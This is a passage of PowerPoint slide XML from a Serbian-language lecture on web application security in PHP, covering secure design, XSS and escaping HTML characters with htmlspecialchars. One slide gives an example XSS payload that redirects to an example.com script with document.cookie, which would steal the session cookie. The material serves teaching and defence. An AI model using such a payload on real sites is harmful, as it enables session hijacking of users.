              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>metode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dirty="0"/>
              <a:t>U </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>zavisnosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>naših</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>potreba</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>postoji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>više</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rešenja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više</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>različitih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>nam</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>mogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>pomoći</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" b="0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F50F23-660C-47CE-BC98-003E81C60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693" y="2530974"/>
            <a:ext cx="8543925" cy="8816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&lt;script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR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document.location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='http://www.example.com/ukradi.php?kolacic='+document.cookie</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef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&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34579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371F8-E182-4D0D-81B1-2FF8F79A9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Uvod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>nastavak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>…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D6D65-70C4-40D0-A81F-FFCA5A3AC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995362"/>
            <a:ext cx="7194550" cy="514667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b="0" dirty="0" err="1"/>
              <a:t>Bezbijednost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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ideja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err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>pri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b="0" dirty="0" err="1"/>
              <a:t>konstruisanju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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>podrazumijeva</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>će</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>aplikacija</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nastavi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>funkcioniše</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ispravno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u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>specijalnim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>situacijama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kao</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>što</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>zlonamerni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>napadi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>kao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nepravilno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>korišćenje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 od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>strane</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nestručnog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>korisnika</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>Kao </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>najbolja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>praksa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pokazalo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> da se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>pri</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>razvoju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>bezbjedne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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>uključuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>razmišljanje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ranim</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>fazama</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>životnog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>ciklusa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>softvera</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>razumiju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>uobičajene</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>prijetnje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>mogu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>javiti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>softverske</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>nepravilnosti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>podvrgnuti</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>temeljnoj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objektivnoj</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>analizi</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>rizika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testiranju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>Softveri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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>koji</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> se </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>razvijaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>uglavnom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>imaju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>najviše</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>grešaka</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>prilikom</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>implementacije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr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utvrđeno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> je da je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sigurnost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>mnogih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>sistema</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>zbog</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t> mana u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0" err="1"/>
              <a:t>dizajnu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narušena</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="sr-Latn-ME" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2016332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62528-171D-4016-83E6-A19AADA8B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HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>entiteti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F5412-CC6A-460B-ABF1-4CC7005E87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219200"/>
            <a:ext cx="7194550" cy="4922838"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Jedno</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>rješenja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> za XSS je da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>specijalne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>karaktere</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(&lt;,&gt;,‘,“,&amp;) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>konvertujemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>njihove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tekstualne</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>entitete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="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lt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;,&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="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gt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;,&amp;apos;,&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>quot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>;,&amp;amp;)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tako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>možemo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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>sigurni</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> da </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>će</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kôd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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ispisan</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>onako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>kako</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>unijet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>, pa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tako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JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>neće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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>izvšen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>PHP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>poseduje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>dvije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>funkcije</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>konvertuju</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>tagove</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>entitete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Jedna</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> od </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>njih</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> je </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" u="sng" dirty="0" err="1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htmlspecialchars</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>koja</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>konvertuje</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> gore </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
